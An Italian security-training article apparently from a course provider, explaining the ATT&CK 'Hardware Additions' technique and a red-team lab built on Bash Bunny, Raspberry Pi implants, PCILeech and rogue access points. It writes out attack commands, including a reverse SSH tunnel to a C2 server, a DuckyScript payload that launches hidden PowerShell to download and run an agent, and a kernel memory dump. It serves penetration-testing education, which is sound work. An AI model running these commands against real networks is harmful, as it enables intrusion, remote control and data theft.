Iscriviti al webinar gratuito del 12 Maggio per diventare Forensic Analyst! Scopri di più
Corso Ethical Hacker: accedi alla promozione fino al 30 Aprile! Scopri di più
La tecnica Hardware Additions consiste nell'introduzione fisica di dispositivi — chiavette USB modificate, single-board computer, adattatori di rete, tap passivi — all'interno del perimetro di un'organizzazione per ottenere un punto d'appoggio iniziale sulla rete. Si colloca nella tattica Initial Access (TA0001), la fase in cui l'avversario cerca di mettere piede nell'ambiente bersaglio.
A differenza della semplice distribuzione di payload tramite supporti rimovibili, questa tecnica introduce hardware con funzionalità attive: keystroke injection per digitare comandi in pochi secondi, accesso diretto alla memoria del kernel via DMA attraverso porte Thunderbolt o PCIe, creazione di punti d'accesso wireless non autorizzati, intercettazione passiva del traffico di rete. Il dispositivo diventa un impianto fisico persistente, spesso invisibile ai controlli software tradizionali.
I riferimenti pubblici a operazioni reali condotte da threat actor sono limitati, ma il framework documenta 1 gruppo APT che ha impiegato questa tecnica in campagne contro istituzioni finanziarie. Sul versante offensivo, i team di penetration testing la adottano regolarmente con prodotti commerciali e open source. Il panorama delle 2 mitigazioni disponibili si concentra sulla limitazione dell'installazione hardware e sul controllo degli accessi di rete — due pilastri che, se implementati correttamente, riducono drasticamente la superficie d'attacco fisica.
L'obiettivo in laboratorio è simulare l'intera catena: collegamento fisico, enumerazione della rete locale, e pivot verso risorse interne. Servono dispositivi reali e un ambiente controllato con VLAN segmentate.
Il punto di partenza più comune è Bash Bunny di Hak5 (a pagamento), un dispositivo USB che emula contemporaneamente tastiera HID, storage di massa e adattatore Ethernet. Inserendolo in una workstation sbloccata, può eseguire payload DuckyScript in pochi secondi. In alternativa, P4wnP1 A.L.O.A. (open source) trasforma un Raspberry Pi Zero W in un impianto multi-funzione: HID, Ethernet over USB, Wi-Fi rogue AP. La configurazione avviene via interfaccia web integrata.
Per simulare lo scenario DarkVishnya — il gruppo che ha fisicamente collegato Bash Bunny, Raspberry Pi e netbook economici alla rete locale delle organizzazioni target — il setup ideale prevede un Raspberry Pi con sistema operativo Kali Linux connesso via cavo Ethernet a una porta di rete in un'area comune (sala riunioni, stampanti). Il dispositivo ottiene un lease DHCP e apre un tunnel reverse SSH verso un server C2 esterno.
Una volta connesso il Raspberry Pi alla rete, la sequenza operativa si sviluppa così. Prima si verifica la connettività e l'indirizzo ottenuto:
ip addr show eth0
Poi si avvia la scansione della subnet locale con Nmap (open source) per identificare host attivi e servizi esposti:
nmap -sn 192.168.1.0/24 -oG discovery.txt
Il passo successivo è stabilire persistenza con un tunnel reverse SSH verso il server C2 controllato dal red team:
ssh -R 4443:localhost:22 operatore@c2-server -fN
Per lo scenario keystroke injection con Bash Bunny, un payload DuckyScript minimale apre PowerShell e scarica un agent:
DELAY 2000
GUI r
DELAY 500
STRING powershell -w hidden -ep bypass -c "IEX(New-Object Net.WebClient).DownloadString('
Per testare attacchi DMA via Thunderbolt, PCILeech (open source) consente la lettura diretta della memoria del kernel tramite schede FPGA collegate a porte Thunderbolt o M.2. Il comando base per il dump della memoria fisica è:
pcileech dump -out memory.raw -device fpga
Infine, per il rogue wireless AP, hostapd (open source) su Raspberry Pi crea un punto d'accesso con SSID identico a quello aziendale, combinato con dnsmasq (open source) per il DHCP. Questo simula l'aggiunta di infrastruttura wireless non autorizzata alla rete.
Documentate ogni passo con screenshot e timestamp: il report deve dimostrare che un accesso fisico non controllato equivale a un accesso logico completo.
Scarica la guida gratuita e segui il percorso corretto fin dal primo passo